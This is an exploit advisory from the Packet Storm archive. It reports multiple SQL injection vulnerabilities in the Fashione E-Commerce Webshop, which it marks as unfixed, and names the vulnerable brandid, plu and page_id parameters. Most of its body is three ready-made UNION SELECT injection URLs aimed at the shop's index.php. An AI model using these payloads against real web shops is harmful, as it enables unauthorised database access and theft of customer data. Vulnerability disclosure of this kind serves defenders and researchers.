Fashione E-Commerce Webshop SQL Injection

2010-09-21T00:00:00
ID PACKETSTORM:94027
Type packetstorm
Reporter secret
Modified 2010-09-21T00:00:00

Description

                                        
                                            ` ________ _____________ / /_  
/ ___/ _ \/ ___/ ___/ _ \/ __/  
(__ ) __/ /__/ / / __/ /_   
/____/\___/\___/_/ \___/\__/ #####################################################################  
  
# Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities  
# Date: 2010-09-19  
# Author: secret  
# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77  
# Site : swissfaking.net/board  
# Software Link: http://www.fashione.co.uk/  
# Version: All versions so far  
# Tested on: XP  
  
# Fixed? : NOT FIXED  
  
----------------------------------------------------------------------------  
  
[Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id="  
  
e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4  
  
e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4  
  
e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4  
  
################################################################################################  
  
[THANKS TO]  
  
ALLAH - الله لا إله لا ايل  
  
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION   
  
`